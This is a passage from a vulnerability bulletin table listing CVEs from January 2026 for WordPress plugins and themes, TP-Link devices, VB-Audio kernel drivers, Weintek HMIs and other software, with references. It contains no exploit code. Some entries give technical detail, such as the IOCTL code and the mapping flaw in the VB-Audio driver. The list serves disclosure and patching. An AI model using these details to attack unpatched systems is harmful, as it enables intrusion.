| themeton--Consult Aid | Deserialization of Untrusted Data vulnerability in themeton Consult Aid consultaid allows Object Injection. This issue affects Consult Aid: from n/a through <= 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-67617 | https://patchstack.com/database/Wordpress/Theme/consultaid/vulnerability/wordpress-consult-aid-theme-1-4-3-php-object-injection-vulnerability?_s_id=cve |
| Themeum--Tutor LMS | Authorization Bypass Through User-Controlled Key vulnerability in Themeum Tutor LMS tutor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tutor LMS: from n/a through <= 3.9.4. | 2026-01-22 | not yet calculated | CVE-2025-47555 | https://patchstack.com/database/Wordpress/Plugin/tutor/vulnerability/wordpress-tutor-lms-plugin-3-9-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Themeum--Tutor LMS BunnyNet Integration | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS BunnyNet Integration tutor-lms-bunnynet-integration allows DOM-Based XSS. This issue affects Tutor LMS BunnyNet Integration: from n/a through <= 1.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24584 | https://patchstack.com/database/Wordpress/Plugin/tutor-lms-bunnynet-integration/vulnerability/wordpress-tutor-lms-bunnynet-integration-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThimPress--LearnPress – Course Review | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress – Course Review learnpress-course-review allows Stored XSS. This issue affects LearnPress – Course Review: from n/a through <= 4.1.9. | 2026-01-22 | not yet calculated | CVE-2026-24361 | https://patchstack.com/database/Wordpress/Plugin/learnpress-course-review/vulnerability/wordpress-learnpress-course-review-plugin-4-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Tickera--Tickera | Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tickera: from n/a through <= 3.5.6.2. | 2026-01-22 | not yet calculated | CVE-2025-67939 | https://patchstack.com/database/Wordpress/Plugin/tickera-event-ticketing-system/vulnerability/wordpress-tickera-plugin-3-5-6-2-broken-access-control-vulnerability?_s_id=cve |
| Timur Kamaev--Kama Thumbnail | Cross-Site Request Forgery (CSRF) vulnerability in Timur Kamaev Kama Thumbnail kama-thumbnail allows Cross Site Request Forgery. This issue affects Kama Thumbnail: from n/a through <= 3.5.1. | 2026-01-23 | not yet calculated | CVE-2026-24521 | https://patchstack.com/database/Wordpress/Plugin/kama-thumbnail/vulnerability/wordpress-kama-thumbnail-plugin-3-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| tinyMQTT--tinyMQTT | In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), a memory leak occurs due to the broker's failure to validate or reject malformed UTF-8 strings in topic filters. An attacker can exploit this by sending repeated subscription requests with arbitrarily large or invalid filter payloads. Each request causes memory to be allocated for the malformed topic filter, but the broker does not free the associated memory, leading to unbounded heap growth and potential denial of service under sustained attack. | 2026-01-20 | not yet calculated | CVE-2025-56353 | https://github.com/JustDoIt0910/tinyMQTT/issues/19 |
| TMS Global--TMS Global | A path traversal vulnerability exists in TMS Management Console (version 6.3.7.27386.20250818) from TMS Global Software. The "Download Template" function in the profile dashboard does not neutralize directory traversal sequences (../) in the filePath parameter, allowing authenticated users to read arbitrary files, such as the server's Web.config. | 2026-01-22 | not yet calculated | CVE-2025-69612 | http://tms.com https://tmsglobalsoft.com/ https://github.com/Cr0wld3r/CVE-2025-69612/blob/main/PoC.md |
| TMS Global--TMS Global | File Upload vulnerability in TMS Global Software TMS Management Console v.6.3.7.27386.20250818 allows a remote attacker to execute arbitrary code via the Logo upload in /Customer/AddEdit. | 2026-01-22 | not yet calculated | CVE-2025-69828 | https://tmsglobalsoft.com https://github.com/ZuoqTr/CVE/blob/main/CVE-2025-69828.md |
| TopDesk--TopDesk | An improper certificate validation vulnerability exists in ToDesktop Builder v0.32.1. This vulnerability allows an unauthenticated, on-path attacker to spoof backend responses by exploiting insufficient certificate validation. | 2026-01-23 | not yet calculated | CVE-2025-67229 | https://www.todesktop.com/changelog https://www.todesktop.com/security/advisories/TDSA-2025-001 |
| TopDesktop--TopDesktop | Improper permissions in the handler for the Custom URL Scheme in ToDesktop Builder v0.33.0 allows attackers with renderer-context access to invoke external protocol handlers without sufficient validation. | 2026-01-23 | not yet calculated | CVE-2025-67230 | https://www.todesktop.com/changelog https://www.todesktop.com/security/advisories/TDSA-2025-002 |
| TopDesktop--TopDesktop | A reflected cross-site scripting (XSS) vulnerability in ToDesktop Builder v0.33.1 allows attackers to execute arbitrary code in the context of a user's browser via a crafted payload. | 2026-01-23 | not yet calculated | CVE-2025-67231 | https://www.todesktop.com/changelog https://www.todesktop.com/security/advisories/TDSA-2025-003 |
| topdevs--Smart Product Viewer | Missing Authorization vulnerability in topdevs Smart Product Viewer smart-product-viewer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Smart Product Viewer: from n/a through <= 1.5.4. | 2026-01-23 | not yet calculated | CVE-2026-24588 | https://patchstack.com/database/Wordpress/Plugin/smart-product-viewer/vulnerability/wordpress-smart-product-viewer-plugin-1-5-4-broken-access-control-vulnerability?_s_id=cve |
| TP-Link Systems Inc.--Archer C20 v6.0, Archer AX53 v1.0 | Logic vulnerability in TP-Link Archer C20 v6.0 and Archer AX53 v1.0 (TDDP module) allows unauthenticated adjacent attackers to execute administrative commands including factory reset and device reboot without credentials. Attackers on the adjacent network can remotely trigger factory resets and reboots without credentials, causing configuration loss and interruption of device availability. This issue affects Archer C20 v6.0 < V6_251031 and Archer AX53 v1.0 < V1_251215. | 2026-01-21 | not yet calculated | CVE-2026-0834 | https://www.tp-link.com/en/support/download/archer-c20/v6/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://mattg.systems/posts/cve-2026-0834/ |
| TP-Link Systems Inc.--Omada Software Controller | A Cross-Site Scripting (XSS) vulnerability was identified in a parameter in Omada Controllers due to improper input sanitization. Exploitation requires advanced conditions, such as network positioning or emulating a trusted entity, and user interaction by an authenticated administrator. If successful, an attacker could execute arbitrary JavaScript in the administrator's browser, potentially exposing sensitive information and compromising confidentiality. | 2026-01-22 | not yet calculated | CVE-2025-9289 | https://support.omadanetworks.com/us/download/ https://support.omadanetworks.com/us/document/114950/ |
| TP-Link Systems Inc.--Omada Software Controller | An authentication weakness was identified in the controller-device adoption process of Omada Controllers, Gateways and Access Points due to improper handling of random values. Exploitation requires advanced network positioning and allows an attacker to intercept adoption traffic and forge valid authentication through offline precomputation, potentially exposing sensitive information and compromising confidentiality. | 2026-01-22 | not yet calculated | CVE-2025-9290 | https://support.omadanetworks.com/us/download/ https://support.omadanetworks.com/en/download/ https://support.omadanetworks.com/us/document/114950/ |
| Trimble--SketchUp | Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27769. | 2026-01-23 | not yet calculated | CVE-2025-15062 | ZDI-25-1198 |
| Trusona--Trusona for WordPress | Missing Authorization vulnerability in Trusona Trusona for WordPress trusona allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Trusona for WordPress: from n/a through <= 2.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24627 | https://patchstack.com/database/Wordpress/Plugin/trusona/vulnerability/wordpress-trusona-for-wordpress-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve |
| TYPO3--Extension "Mailqueue" | The extension extends TYPO3's FileSpool component, which was vulnerable to Insecure Deserialization prior to TYPO3-CORE-SA-2026-004 (https://typo3.org/security/advisory/typo3-core-sa-2026-004). Since the related fix is overwritten by the extension, using the extension with a patched TYPO3 core version still allows for Insecure Deserialization, because the affected vulnerable code was extracted from TYPO3 core to the extension. More information about this vulnerability can be found in the related TYPO3 Core Security Advisory TYPO3-CORE-SA-2026-004 (https://typo3.org/security/advisory/typo3-core-sa-2026-004). | 2026-01-20 | not yet calculated | CVE-2026-0895 | https://typo3.org/security/advisory/typo3-ext-sa-2026-001 https://github.com/CPS-IT/mailqueue/commit/fd09aa4e1a751551bae4b228bee814e22f2048db https://github.com/CPS-IT/mailqueue/commit/12a0a35027bb5609917790a94e43bbf117abf733 |
| Unknown--Bookingor | The Bookingor WordPress plugin through 1.0.12 exposes authenticated AJAX actions without capability or nonce checks, allowing low-privileged users to delete the plugin's data. | 2026-01-20 | not yet calculated | CVE-2025-12573 | https://wpscan.com/vulnerability/b6198d76-813c-4f13-8b3d-b4609095ae34/ |
| upnp--upnp | A command injection vulnerability exists in the upnp_relay() function in multiple ipTIME router models because the controlURL value used to pass port-forwarding information to an upper router is passed to system() without proper validation or sanitization, allowing OS command injection. | 2026-01-20 | not yet calculated | CVE-2025-55423 | https://iptime.com/iptime/?pageid=4&page_id=126&dfsid=3&dftid=583&uid=25203&mod=document https://docs.google.com/spreadsheets/d/1kryOFltCmnPJvDTpIrudgryt79uI4PWchuQ8-Gak24c/edit?usp=sharing https://github.com/0x0xxxx/CVE/blob/main/CVE-2025-55423/README.md https://github.com/0x0xxxx/CVE/blob/main/CVE-2025-55423/assets/affected_products_cve_format.json |
| uPress--Booter | Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Booter: from n/a through <= 1.5.7. | 2026-01-23 | not yet calculated | CVE-2026-24534 | https://patchstack.com/database/Wordpress/Plugin/booter-bots-crawlers-manager/vulnerability/wordpress-booter-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve |
| Upsonic--Upsonic | Upsonic Cloudpickle Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Upsonic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the add_tool endpoint, which listens on TCP port 7541 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26845. | 2026-01-23 | not yet calculated | CVE-2026-0773 | ZDI-26-042 |
| uxper--Golo | Missing Authorization vulnerability in uxper Golo golo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Golo: from n/a through < 1.7.5. | 2026-01-22 | not yet calculated | CVE-2026-23974 | https://patchstack.com/database/Wordpress/Theme/golo/vulnerability/wordpress-golo-theme-1-7-5-broken-access-control-vulnerability?_s_id=cve |
| uxper--Golo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in uxper Golo golo allows PHP Local File Inclusion. This issue affects Golo: from n/a through < 1.7.5. | 2026-01-22 | not yet calculated | CVE-2026-23975 | https://patchstack.com/database/Wordpress/Theme/golo/vulnerability/wordpress-golo-theme-1-7-5-local-file-inclusion-vulnerability?_s_id=cve |
| VB-Audio Software--Matrix | VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a local privilege escalation vulnerability in the VBMatrix VAIO virtual audio driver (vbmatrixvaio64*_win10.sys). The driver allocates a 128-byte non-paged pool buffer and, upon receiving IOCTL 0x222060, maps it into user space using an MDL and MmMapLockedPagesSpecifyCache. Because the allocation size is not page-aligned, the mapping exposes the entire 0x1000-byte kernel page containing the buffer plus adjacent non-paged pool allocations with read/write permissions. An unprivileged local attacker can open a device handle (using the required 0x800 attribute flag), invoke the IOCTL to obtain the mapping, and then read or modify live kernel objects and pointers present on that page. This enables bypass of KASLR, arbitrary kernel memory read/write within the exposed page, corruption of kernel objects, and escalation to SYSTEM. | 2026-01-22 | not yet calculated | CVE-2026-23763 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23763 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-matrix-drivers-local-privilege-escalation-via-kernel-memory-exposure |
| VB-Audio Software--Voicemeeter (Standard) | VB-Audio Voicemeeter, Voicemeeter Banana, and Voicemeeter Potato (versions ending in 1.1.1.9, 2.1.1.9, and 3.1.1.9 and earlier, respectively), as well as VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a vulnerability in their virtual audio drivers (vbvoicemeetervaio64*.sys, vbmatrixvaio64*.sys, vbaudio_vmauxvaio*.sys, vbaudio_vmvaio*.sys, and vbaudio_vmvaio3*.sys). When a handle is opened with a special file attribute value, the drivers improperly initialize FILE_OBJECT->FsContext to a non-pointer magic value. If subsequent operations are not handled by the VB-Audio driver and are forwarded down the audio driver stack (e.g., via PortCls to ks.sys), the invalid FsContext value can be dereferenced, causing a kernel crash (BSoD), typically SYSTEM_SERVICE_EXCEPTION with STATUS_ACCESS_VIOLATION. This flaw allows a local unprivileged user to trigger a denial-of-service on affected Windows systems. | 2026-01-22 | not yet calculated | CVE-2026-23761 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23761 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-voicemeeter-and-matrix-drivers-dos-via-improper-file-object-fscontext-initialization |
| VB-Audio Software--Voicemeeter (Standard) | VB-Audio Voicemeeter, Voicemeeter Banana, and Voicemeeter Potato (versions ending in 1.1.1.9, 2.1.1.9, and 3.1.1.9 and earlier, respectively), as well as VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a vulnerability in their virtual audio drivers (vbvoicemeetervaio64*.sys, vbmatrixvaio64*.sys, vbaudio_vmauxvaio*.sys, vbaudio_vmvaio*.sys, and vbaudio_vmvaio3*.sys). The drivers map non-paged pool memory into user space via MmMapLockedPagesSpecifyCache using UserMode access without proper exception handling. If the mapping fails, such as when a process has exhausted available virtual address space, MmMapLockedPagesSpecifyCache raises an exception that is not caught, causing a kernel crash (BSoD), typically SYSTEM_SERVICE_EXCEPTION with STATUS_NO_MEMORY. This flaw allows a local unprivileged user to trigger a denial-of-service on affected Windows systems. | 2026-01-22 | not yet calculated | CVE-2026-23762 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23762 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-voicemeeter-and-matrix-drivers-dos-via-mmmaplockedpagesspecifycache |
| VB-Audio Software--Voicemeeter (Standard) | VB-Audio Voicemeeter, Voicemeeter Banana, and Voicemeeter Potato (versions ending in 1.1.1.9, 2.1.1.9, and 3.1.1.9 and earlier, respectively), as well as VB-Audio Matrix and Matrix Coconut (versions ending in 1.0.2.2 and 2.0.2.2 and earlier, respectively), contain a vulnerability in their virtual audio drivers (vbvoicemeetervaio64*.sys, vbmatrixvaio64*.sys, vbaudio_vmauxvaio*.sys, vbaudio_vmvaio*.sys, and vbaudio_vmvaio3*.sys). The drivers allocate non-paged pool and map it into user space, where a length value associated with the allocation is exposed and can be modified by an unprivileged local attacker. On subsequent IOCTL handling, the corrupted length is used directly as the IoAllocateMdl length argument without adequate integrity checks before building and mapping the MDL, which can cause a kernel crash (BSoD), typically PAGE_FAULT_IN_NONPAGED_AREA. This flaw allows a local user to trigger a denial-of-service on affected Windows systems. | 2026-01-22 | not yet calculated | CVE-2026-23764 | https://github.com/emkaix/security-research/tree/main/CVE-2026-23764 https://forum.vb-audio.com/viewtopic.php?p=7574#p7574 https://forum.vb-audio.com/viewtopic.php?p=7527#p7527 https://vb-audio.com/ https://www.vulncheck.com/advisories/vb-audio-voicemeeter-and-matrix-drivers-dos-via-corrupted-ioallocatemdl-length |
| VEGA--VEGA | An issue in Beat XP VEGA Smartwatch (Firmware Version RB303ATV006229) allows an attacker to cause a denial of service via the BLE connection. | 2026-01-22 | not yet calculated | CVE-2025-69821 | https://github.com/CipherX1802/CVE-2025-69821-Beat-XP-Vega-Smartwatch-Security-Assessment/blob/main/BeatXP_Vega_Smartwatch_Security_Assessment_Report.pdf https://github.com/CipherX1802/CVE-2025-69821-Beat-XP-Vega-Smartwatch-Security-Assessment.git |
| VibeThemes--WPLMS | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in VibeThemes WPLMS wplms_plugin allows Path Traversal. This issue affects WPLMS: from n/a through <= 1.9.9.5.4. | 2026-01-22 | not yet calculated | CVE-2025-69097 | https://patchstack.com/database/Wordpress/Plugin/wplms_plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-4-arbitrary-file-deletion-vulnerability?_s_id=cve |
| Vladimir Statsenko--Terms descriptions | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vladimir Statsenko Terms descriptions terms-descriptions allows DOM-Based XSS. This issue affects Terms descriptions: from n/a through <= 3.4.9. | 2026-01-23 | not yet calculated | CVE-2026-24621 | https://patchstack.com/database/Wordpress/Plugin/terms-descriptions/vulnerability/wordpress-terms-descriptions-plugin-3-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Vollstart--Event Tickets with Ticket Scanner | Improper Control of Generation of Code ('Code Injection') vulnerability in Vollstart Event Tickets with Ticket Scanner event-tickets-with-ticket-scanner allows Code Injection. This issue affects Event Tickets with Ticket Scanner: from n/a through <= 2.8.3. | 2026-01-22 | not yet calculated | CVE-2025-68015 | https://patchstack.com/database/Wordpress/Plugin/event-tickets-with-ticket-scanner/vulnerability/wordpress-event-tickets-with-ticket-scanner-plugin-2-7-10-remote-code-execution-rce-vulnerability?_s_id=cve |
| vrpr--WDV One Page Docs | Missing Authorization vulnerability in vrpr WDV One Page Docs wdv-one-page-docs allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WDV One Page Docs: from n/a through <= 1.2.4. | 2026-01-22 | not yet calculated | CVE-2025-68896 | https://patchstack.com/database/Wordpress/Plugin/wdv-one-page-docs/vulnerability/wordpress-wdv-one-page-docs-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| WANotifier--WANotifier | Missing Authorization vulnerability in WANotifier WANotifier notifier allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WANotifier: from n/a through <= 2.7.12. | 2026-01-22 | not yet calculated | CVE-2025-68020 | https://patchstack.com/database/Wordpress/Plugin/notifier/vulnerability/wordpress-wanotifier-plugin-2-7-12-broken-access-control-vulnerability?_s_id=cve |
| WatchYourLAN--WatchYourLAN | WatchYourLAN Configuration Page Argument Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of WatchYourLAN. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the arpstrs parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26708. | 2026-01-23 | not yet calculated | CVE-2026-0774 | ZDI-26-039 |
| wbolt.com--IMGspider | Server-Side Request Forgery (SSRF) vulnerability in wbolt.com IMGspider imgspider allows Server Side Request Forgery. This issue affects IMGspider: from n/a through <= 2.3.12. | 2026-01-22 | not yet calculated | CVE-2026-22482 | https://patchstack.com/database/Wordpress/Plugin/imgspider/vulnerability/wordpress-imgspider-plugin-2-3-12-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Web Impian--Bayarcash WooCommerce | Missing Authorization vulnerability in Web Impian Bayarcash WooCommerce bayarcash-wc allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bayarcash WooCommerce: from n/a through <= 4.3.11. | 2026-01-23 | not yet calculated | CVE-2026-24606 | https://patchstack.com/database/Wordpress/Plugin/bayarcash-wc/vulnerability/wordpress-bayarcash-woocommerce-plugin-4-3-11-broken-access-control-vulnerability?_s_id=cve |
| WebAppick--CTX Feed | Missing Authorization vulnerability in WebAppick CTX Feed webappick-product-feed-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CTX Feed: from n/a through <= 6.6.18. | 2026-01-22 | not yet calculated | CVE-2026-22461 | https://patchstack.com/database/Wordpress/Plugin/webappick-product-feed-for-woocommerce/vulnerability/wordpress-ctx-feed-plugin-6-6-15-broken-access-control-vulnerability?_s_id=cve |
| webdevstudios--Automatic Featured Images from Videos | Missing Authorization vulnerability in webdevstudios Automatic Featured Images from Videos automatic-featured-images-from-videos allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Automatic Featured Images from Videos: from n/a through <= 1.2.7. | 2026-01-23 | not yet calculated | CVE-2026-24535 | https://patchstack.com/database/Wordpress/Plugin/automatic-featured-images-from-videos/vulnerability/wordpress-automatic-featured-images-from-videos-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve |
| WebGeniusLab--iRecco Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebGeniusLab iRecco Core irecco-core allows PHP Local File Inclusion. This issue affects iRecco Core: from n/a through <= 1.3.6. | 2026-01-22 | not yet calculated | CVE-2025-69046 | https://patchstack.com/database/Wordpress/Plugin/irecco-core/vulnerability/wordpress-irecco-core-plugin-1-3-6-local-file-inclusion-vulnerability?_s_id=cve |
| WebPros--WebPros | An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation. | 2026-01-22 | not yet calculated | CVE-2025-66428 | https://docs.plesk.com/release-notes/obsidian/change-log/#wordpress-toolkit-6.9.1 |
| webpushr--Webpushr | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data. This issue affects Webpushr: from n/a through <= 4.38.0. | 2026-01-23 | not yet calculated | CVE-2026-24536 | https://patchstack.com/database/Wordpress/Plugin/webpushr-web-push-notifications/vulnerability/wordpress-webpushr-plugin-4-38-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| Weintek--cMT3072XH | The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable. A low-privileged user can modify the parameters and potentially manipulate account-level privileges. | 2026-01-22 | not yet calculated | CVE-2025-14750 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05 |
| Weintek--cMT3072XH | A low-privileged user can bypass account credentials without confirming the user's current authentication state, which may lead to unauthorized privilege escalation. | 2026-01-22 | not yet calculated | CVE-2025-14751 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-05 |
| WEN Solutions--Contact Form 7 GetResponse Extension | Insertion of Sensitive Information Into Sent Data vulnerability in WEN Solutions Contact Form 7 GetResponse Extension contact-form-7-getresponse-extension allows Retrieve Embedded Sensitive Data. This issue affects Contact Form 7 GetResponse Extension: from n/a through <= 1.0.8. | 2026-01-23 | not yet calculated | CVE-2026-24557 | https://patchstack.com/database/Wordpress/Plugin/contact-form-7-getresponse-extension/vulnerability/wordpress-contact-form-7-getresponse-extension-plugin-1-0-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| whisper-money--whisper-money | Whisper Money is a personal finance application. Versions prior to 0.1.5 have an insecure direct object reference vulnerability. A user can update/create account balances in other users' bank accounts. Version 0.1.5 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-23844 | https://github.com/whisper-money/whisper-money/security/advisories/GHSA-c4g3-wpxr-2m74 https://github.com/whisper-money/whisper-money/pull/60 https://github.com/whisper-money/whisper-money/commit/80117c3edeaf5c5a5166f3815fc555a15b5ce686 |
| winkm89--teachPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in winkm89 teachPress teachpress allows Stored XSS. This issue affects teachPress: from n/a through <= 9.0.12. | 2026-01-22 | not yet calculated | CVE-2026-22353 | https://patchstack.com/database/Wordpress/Plugin/teachpress/vulnerability/wordpress-teachpress-plugin-9-0-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| winkm89--teachPress | Cross-Site Request Forgery (CSRF) vulnerability in winkm89 teachPress teachpress allows Cross Site Request Forgery. This issue affects teachPress: from n/a through <= 9.0.12. | 2026-01-22 | not yet calculated | CVE-2026-22483 | https://patchstack.com/database/Wordpress/Plugin/teachpress/vulnerability/wordpress-teachpress-plugin-9-0-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WisdmLabs--Edwiser Bridge | Missing Authorization vulnerability in WisdmLabs Edwiser Bridge edwiser-bridge allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Edwiser Bridge: from n/a through <= 4.3.2. | 2026-01-23 | not yet calculated | CVE-2026-24570 | https://patchstack.com/database/Wordpress/Plugin/edwiser-bridge/vulnerability/wordpress-edwiser-bridge-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve |
| woofer696--Dinatur | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woofer696 Dinatur dinatur allows Stored XSS. This issue affects Dinatur: from n/a through <= 1.18. | 2026-01-22 | not yet calculated | CVE-2025-68866 | https://patchstack.com/database/Wordpress/Plugin/dinatur/vulnerability/wordpress-dinatur-plugin-1-18-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WorklogPRO--WorklogPRO | The WorklogPRO - Timesheets for Jira plugin in Jira Data Center before version 4.23.6-jira10 and before version 4.23.5-jira9 allows users and attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability. The vulnerability is exploited via a specially crafted payload placed in an issue's summary field. | 2026-01-21 | not yet calculated | CVE-2025-57681 | https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history https://thestarware.atlassian.net/wiki/spaces/WLP/pages/3326574597/Security+Advisory+CVE-2025-57681+-+Stored+XSS+in+WorklogPRO+DC |
| WorklogPRO--WorklogPRO | The WorklogPRO - Jira Timesheets plugin in the Jira Data Center before 4.24.2-jira9, 4.24.2-jira10 and 4.24.2-jira11 allows attackers to inject arbitrary HTML or JavaScript via XSS. This is exploited via a crafted payload placed in the name of a filter. This code is executed in the browser when the user attempts to create a timesheet with the filter timesheet type on the custom timesheet dialog because the filter name is not properly sanitized during the action. | 2026-01-20 | not yet calculated | CVE-2025-67824 | https://marketplace.atlassian.com/apps/1212626/worklogpro-timesheets-for-jira/version-history https://thestarware.atlassian.net/wiki/x/CAAdyg |
| WP Chill--Gallery PhotoBlocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Chill Gallery PhotoBlocks photoblocks-grid-gallery allows DOM-Based XSS. This issue affects Gallery PhotoBlocks: from n/a through <= 1.3.2. | 2026-01-22 | not yet calculated | CVE-2026-24389 | https://patchstack.com/database/Wordpress/Plugin/photoblocks-grid-gallery/vulnerability/wordpress-gallery-photoblocks-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Chill--Modula Image Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Chill Modula Image Gallery modula-best-grid-gallery allows Stored XSS. This issue affects Modula Image Gallery: from n/a through <= 2.13.4. | 2026-01-22 | not yet calculated | CVE-2026-23976 | https://patchstack.com/database/Wordpress/Plugin/modula-best-grid-gallery/vulnerability/wordpress-modula-image-gallery-plugin-2-13-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Messiah--Ai Image Alt Text Generator for WP | Missing Authorization vulnerability in WP Messiah Ai Image Alt Text Generator for WP ai-image-alt-text-generator-for-wp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ai Image Alt Text Generator for WP: from n/a through <= 1.1.9. | 2026-01-23 | not yet calculated | CVE-2026-24579 | https://patchstack.com/database/Wordpress/Plugin/ai-image-alt-text-generator-for-wp/vulnerability/wordpress-ai-image-alt-text-generator-for-wp-plugin-1-1-9-broken-access-control-vulnerability?_s_id=cve |
| WP Messiah--Frontis Blocks | Server-Side Request Forgery (SSRF) vulnerability in WP Messiah Frontis Blocks frontis-blocks allows Server Side Request Forgery. This issue affects Frontis Blocks: from n/a through <= 1.1.5. | 2026-01-22 | not yet calculated | CVE-2025-68030 | https://patchstack.com/database/Wordpress/Plugin/frontis-blocks/vulnerability/wordpress-frontis-blocks-plugin-1-1-5-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| WP Swings--Points and Rewards for WooCommerce | Missing Authorization vulnerability in WP Swings Points and Rewards for WooCommerce points-and-rewards-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Points and Rewards for WooCommerce: from n/a through <= 2.9.5. | 2026-01-23 | not yet calculated | CVE-2026-24581 | https://patchstack.com/database/Wordpress/Plugin/points-and-rewards-for-woocommerce/vulnerability/wordpress-points-and-rewards-for-woocommerce-plugin-2-9-5-broken-access-control-vulnerability?_s_id=cve |
| WP Travel--WP Travel | Missing Authorization vulnerability in WP Travel WP Travel wp-travel allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Travel: from n/a through <= 11.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24568 | https://patchstack.com/database/Wordpress/Plugin/wp-travel/vulnerability/wordpress-wp-travel-plugin-11-0-0-broken-access-control-vulnerability?_s_id=cve |
| wpdive--ElementCamp | Missing Authorization vulnerability in wpdive ElementCamp element-camp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ElementCamp: from n/a through <= 2.3.2. | 2026-01-23 | not yet calculated | CVE-2026-24556 | https://patchstack.com/database/Wordpress/Plugin/element-camp/vulnerability/wordpress-elementcamp-plugin-2-3-2-broken-access-control-vulnerability?_s_id=cve |
